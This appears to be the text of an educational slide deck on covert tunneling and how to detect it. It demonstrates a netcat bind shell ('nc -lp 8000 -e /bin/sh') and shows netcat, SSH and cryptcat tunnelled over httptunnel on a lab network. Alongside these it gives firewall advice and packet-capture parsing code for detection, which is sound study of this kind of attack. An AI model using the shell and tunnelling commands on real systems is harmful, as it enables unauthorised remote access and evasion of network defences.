
COVERT TUNNELING

Uses and Detection


Rich Janicki

WHAT IS COVERT TUNNELING?


Today covert tunnels are defined as those that
use entities not normally viewed as data objects,
but that can be manipulated maliciously to
transfer information from one subject to
another[2].
Some protocols that can be used are HTTP,
ICMP, DNS, and SSH to name a few
Steganography can be used to conceal data in
image files such as JPEG

WHY IS COVERT TUNNELING IMPORTANT?


As a Network Administrator, one could use
covert tunneling for good
It can provide a safe way to maintain servers remotely
It can hide sensitive data from prying eyes
It allows one to test the network equipment that is
designed to prevent the use of these techniques
Hackers can use tunneling to hide their tracks
Malware can use tunneling to receive updates
and commands, as well as to hide its activities

HOW DO HACKERS USE COVERT TUNNELING?


As stated earlier malware programs can use
tunneling to send and receive commands
Botnets thrive on the ability to use tunneling
The combinations of these techniques allow the
botnet operator to remain hidden while
controlling many computers
Trojans/backdoors use common tools, or
variations of these tools, to allow remote access to
a compromised system
Knowing how these tools operate is key to
defending against them

DEMONSTRATION OF COVERT TUNNELING

NETCAT
The Swiss Army Knife of TCP/IP
Many uses including backdoors, port scanning,
port listening, simple file sharing, and simple
chat
Integrates well with Covert Tunneling
Integrates easily into programs and scripts

NETCAT ON TARGET
****Netcat*****
root@bt:~# nc -lp 8000
hello
hi
this is a basic netcat conversation
ok
goodbye
see you later

NETCAT ON ATTACKER
****Netcat Chat****
rich@netbookremix:~$ nc 192.168.1.121 8000
hello
hi
this is a basic netcat conversation
ok
goodbye
see you later
^C

NETCAT SHELL ON TARGET


****Netcat Shell****
root@bt:~# nc -lp 8000 -e /bin/sh

NETCAT SHELL ON ATTACKER

****Netcat Shell****

rich@netbookremix:~$ nc 192.168.1.121 8000
whoami
root
ifconfig
eth0      Link encap:Ethernet HWaddr 00:0c:76:32:56:61
          inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:27 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)
          Interrupt:23 Base address:0xcc00

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

HTTPTUNNEL
****Netcat over Httptunnel (Target)****
root@bt:~# hts -F localhost:8000 80
root@bt:~# nc -lp 8000

****Netcat over Httptunnel (Attacker)****


rich@netbookremix:~$ htc -F 10001 192.168.1.121:80
rich@netbookremix:~$ nc 127.0.0.1 10001

SSH
****Normal SSH****
rich@netbookremix:~$ ssh root@192.168.1.121
root@192.168.1.121's password:

BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution

Last login: Thu Mar 18 21:57:43 2010


root@bt:~# whoami
root

SSH OVER HTTPTUNNEL

****SSH over Httptunnel (Target)****


root@bt:~# hts -F localhost:22 8081
****SSH over Httptunnel (Attacker)****
rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081
rich@netbookremix:~$ ssh root@127.0.0.1 -p 10003
The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be
established.
RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of
known hosts.
root@127.0.0.1's password:
BackTrack 4 (PwnSauce) Penetration Testing and Auditing
Distribution
Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115
root@bt:~# whoami
root

CRYPTCAT
****Cryptcat****
root@bt:~# cryptcat -lp 9000
hello
hi
this conversation is a basic cryptcat conversation
that means its encrypted right?
yes sir
goodbye
see you later

CRYPTCAT OVER HTTPTUNNEL


****Cryptcat over Httptunnel (As Telnet Port)****
root@bt:~# hts -F localhost:9000 23
root@bt:~# cryptcat -lp 9000

****Cryptcat over Httptunnel(As telnet)****


rich@netbookremix:~$ htc -F 10004 192.168.1.121:23
rich@netbookremix:~$ cryptcat 127.0.0.1 10004

TOOLS TO DEFEND AGAINST COVERT TUNNELING

Web Tap commercial product
Open Source firewalls such as IPCop or
Smoothwall
Wireshark, Network Miner, or NetWitness
Snort Intrusion Detection System (IDS)

FIREWALL RULES
Prevent unwanted traffic
Close and stop unnecessary ports and services
Prevent ACK tunneling by examining the way a
connection is initialized
Set connection timeouts
Enable content filtering
Use Intrusion Detection Systems
Use Proxies with Authentication
Don't allow HTTP-CONNECT queries
Use Anti-virus and anti-malware programs
Inspect log files regularly, monitor traffic, and build
statistics of both [10]

WIRESHARK

[Four Wireshark screenshot slides; the images are not reproduced in this text]

PCAPDUMP.RB
Programmed in Ruby
Uses Ruby pcap, and pcaplet libraries
Command line tool to ease in viewing pcap files
To be used on already captured pcap files
User can see plain text information being sent
over the network faster
Tool I created to learn more about pcap files and
to help understand network protocols
rich@netbookremix:~/presentation$ ruby pcapdump.rb -r alltestshub.pcap
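As an added example (not the author's pcapdump.rb, whose source is not on this page), here is a pure-Ruby reader for classic little-endian libpcap files that recovers the same record pcapdump prints: timestamp, src:port > dst:port, TCP flags and payload. It needs no pcap gem; the sample capture is constructed in memory, not a real one.

```ruby
# Added example, not the author's pcapdump.rb: a pure-Ruby reader for classic
# little-endian libpcap files (Ethernet link type) producing pcapdump-style records.
FLAG_BITS = [["U", 0x20], ["A", 0x10], ["P", 0x08], ["R", 0x04], ["S", 0x02], ["F", 0x01]].freeze

def flag_string(flags)
  FLAG_BITS.map { |name, bit| (flags & bit).zero? ? "." : name }.join   # PSH+ACK -> ".AP..."
end

def parse_pcap(bytes)
  bytes = bytes.b                                                       # index by byte, not character
  magic, _maj, _min, _tz, _sig, _snap, linktype = bytes[0, 24].unpack("VvvVVVV")
  raise "need little-endian pcap with Ethernet frames" unless magic == 0xa1b2c3d4 && linktype == 1
  records, off = [], 24
  while off + 16 <= bytes.bytesize
    sec, usec, caplen, _origlen = bytes[off, 16].unpack("VVVV")
    frame = bytes[off + 16, caplen]
    off += 16 + caplen
    next if frame.bytesize < 54 || frame[12, 2].unpack1("n") != 0x0800   # IPv4 only
    ip = frame[14..]
    next unless ip.getbyte(9) == 6                                      # TCP only
    tcp = ip[((ip.getbyte(0) & 0x0f) * 4)..]
    sport, dport = tcp[0, 4].unpack("nn")
    payload = tcp[((tcp.getbyte(12) >> 4) * 4)..] || ""
    next if payload.empty?                                              # like pcapdump, skip pure ACKs
    records << { time: Time.at(sec, usec).utc.strftime("%H:%M:%S.%6N"),
                 src: "#{ip[12, 4].unpack("C4").join('.')}:#{sport}",
                 dst: "#{ip[16, 4].unpack("C4").join('.')}:#{dport}",
                 flags: flag_string(tcp.getbyte(13)), data: payload }
  end
  records
end

def format_record(r)                                                    # pcapdump-style text
  "#{r[:time]} #{r[:src]} > #{r[:dst]} #{r[:flags]}\nDATA---> #{r[:data].chomp}\n" + "-" * 62
end

# Constructed sample, not a real capture: one PSH+ACK segment carrying "hello",
# assembled as Ethernet/IPv4/TCP (checksums left zero) inside an in-memory pcap.
def build_frame(src, sport, dst, dport, flags, payload)
  tcp = [sport, dport, 1, 1, 0x50, flags, 65535, 0, 0].pack("nnNNCCnnn") + payload.b
  ip  = [0x45, 0, 20 + tcp.bytesize, 0, 0, 64, 6, 0].pack("CCnnnCCn") +
        (src.split(".") + dst.split(".")).map(&:to_i).pack("C8")
  [0, 0, 0x0800].pack("Q>Nn") + ip + tcp                                # zero MACs, EtherType 0x0800
end

def build_pcap(frames, sec, usec)
  header = [0xa1b2c3d4, 2, 4, 0, 0, 65535, 1].pack("VvvVVVV")
  header + frames.map { |f| [sec, usec, f.bytesize, f.bytesize].pack("VVVV") + f }.join
end

SAMPLE_PCAP = build_pcap([build_frame("192.168.1.115", 34828, "192.168.1.121", 8000, 0x18, "hello\n")], 1268967690, 842629)
puts parse_pcap(SAMPLE_PCAP).map { |r| format_record(r) } if __FILE__ == $0
```

Timestamps are printed in UTC here, whereas the listings below show local time.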

PCAPDUMP.RB

****************pcapdump by Rich Janicki********************
23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> hello
---------------------------------------------------------------
23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> hi
---------------------------------------------------------------
23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> this is a basic netcat conversation
---------------------------------------------------------------
23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> ok
---------------------------------------------------------------
23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
DATA---> goodbye
---------------------------------------------------------------
23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
DATA---> see you later

PCAPDUMP.RB

--------------------------------------------------------------
23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...
DATA---> ifconfig
--------------------------------------------------------------
23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...
DATA---> eth0      Link encap:Ethernet HWaddr 00:0c:76:32:56:61
          inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:27 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)
          Interrupt:23 Base address:0xcc00

PCAPDUMP CATCHING HTTPTUNNEL

--------------------------------------------------------------
23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> GET /index.html?crap=1268967869 HTTP/1.1
--------------------------------------------------------------
23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
DATA---> Host: 192.168.1.121:80
Connection: close
--------------------------------------------------------------
23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
DATA---> HTTP/1.1 200 OK
Content-Length: 102400
Connection: close
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: 0
Content-Type: text/html

PCAPDUMP CATCHING HTTPTUNNEL

--------------------------------------------------------------
23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80 .AP...
DATA--->
--------------------------------------------------------------
23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80 .AP...
DATA---> hello
--------------------------------------------------------------
23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256 .AP...
DATA---> E
--------------------------------------------------------------
Content-Type: text/html

CATCHING SSH

--------------------------------------------------------------
23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
--------------------------------------------------------------
23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
--------------------------------------------------------------
23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> ^wx?0JJf{~diffie-hellman-group-exchange-sha256,diffiehellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1sshrsa,ssh-dssaes128-cbc,3des-cbc,blowfish-cbc,cast128cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128ctr,aes192-ctr,aes256-ctraes128-cbc,3des-cbc,blowfish-cbc,cast128cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128ctr,aes192-ctr,aes256-ctrihmac-md5,hmac-sha1,umac-64@openssh.com,hmacripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96ihmac-md5,hmacsha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha196,hmac-md5-96none,zlib@openssh.com,zlibnone,zlib@openssh.com,zlib--------------------------------------------------------------
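Added example, not from the presentation: a small Ruby script that reads pcapdump-style text like the httptunnel and SSH listings above and flags the markers visible in them, namely the `/index.html?crap=<unix time>` request, the fixed 102400-byte no-cache reply, a first payload to port 80 that is not HTTP and, going beyond the page's captures, an SSH banner on a port other than 22. The sample dump is constructed from the page's own lines plus one constructed SSH-on-8081 record.

```ruby
# Added example: detection heuristics over pcapdump-style output (constructed sample below).
HEADER_RE = /\A(\d\d:\d\d:\d\d\.\d+) (\S+) > (\S+) (\S+)\z/
HTTP_START_RE = %r{\A(GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT) |\AHTTP/}
# Parse "time src > dst flags" headers followed by DATA---> payload lines up to a dashed separator.
def parse_dump(text)
  records = []
  text.each_line(chomp: true) do |line|
    if (m = HEADER_RE.match(line))
      records << { time: m[1], src: m[2], dst: m[3], flags: m[4], data: +"" }
    elsif !line.start_with?("-----") && !records.empty?
      records.last[:data] << line.sub(/\ADATA---> ?/, "") << "\n"
    end
  end
  records
end
# Returns one human-readable finding per suspicious record; empty array means nothing flagged.
def findings_for(records)
  seen = {}
  records.each_with_object([]) do |r, out|
    data = r[:data]
    sport, dport = [r[:src], r[:dst]].map { |e| e.split(":").last.to_i }
    next if data.strip.empty?                                   # empty DATA---> records carry nothing
    first = !seen.key?([r[:src], r[:dst]])                      # first data-bearing segment in this direction
    seen[[r[:src], r[:dst]]] = true
    out << "#{r[:time]} #{r[:src]}: httptunnel client request (/index.html?crap=<unix time>)" if data.match?(%r{\AGET /index\.html\?crap=\d+ HTTP/1\.[01]})
    out << "#{r[:time]} #{r[:src]}: httptunnel server reply (102400-byte no-cache body)" if data.include?("Content-Length: 102400") && data.include?("Pragma: no-cache")
    out << "#{r[:time]} #{r[:src]}: non-HTTP first payload to port 80 (#{data.strip[0, 16].inspect})" if first && dport == 80 && !data.match?(HTTP_START_RE)
    out << "#{r[:time]} #{r[:src]}: SSH banner on ports #{sport}/#{dport}, not 22" if data.start_with?("SSH-") && ![sport, dport].include?(22)
  end
end
# Constructed sample: records taken from the listings above plus one invented SSH-on-8081 record.
SAMPLE_DUMP = <<~DUMP
  23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
  DATA---> GET /index.html?crap=1268967869 HTTP/1.1
  --------------------------------------------------------------
  23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
  DATA---> Host: 192.168.1.121:80
  --------------------------------------------------------------
  23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
  DATA---> HTTP/1.1 200 OK
  Content-Length: 102400
  Pragma: no-cache
  --------------------------------------------------------------
  23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80 .AP...
  DATA---> hello
  --------------------------------------------------------------
  23:06:28.404301 192.168.1.121:8081 > 192.168.1.115:54506 .AP...
  DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
DUMP
puts findings_for(parse_dump(SAMPLE_DUMP)) if __FILE__ == $0
```

The second record of the 56256 flow (the Host: header) is deliberately not flagged, because only the first data segment in each direction is tested against the HTTP check.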

EXAMPLE SSH PACKET

23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...
DATA---> "
--------------------------------------------------------------
23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...
DATA--->
IiL7+ec~x^+
'+"d{
w3SX]vj6&Fb?J`[
G&Q
sUceL
Be rA('\
--------------------------------------------------------------

EXAMPLE CRYPTCAT PACKET

--------------------------------------------------------------
23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> QJmQk,N
-------------------------------------------------------------
23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
DATA---> <3e*7(GS&K 0H
-------------------------------------------------------------
23:12:43.066816 192.168.1.121:9000 > 192.168.1.115:57305 .AP...
DATA--->
>9M
-------------------------------------------------------------
23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...
DATA--->
3f_8=M
--------------------------------------------------------------

CONCLUSION
Some things to think about
These tests were performed on a local network
They can be expanded to simulate an attack on a
large network
Pcap files can get very large, very quickly
Don't run Wireshark for extended periods of time
All of the tests were captured in about 15
minutes using one pcap file
Using pcapdump to save the output to a text file
(as was done here) also creates a fairly large file
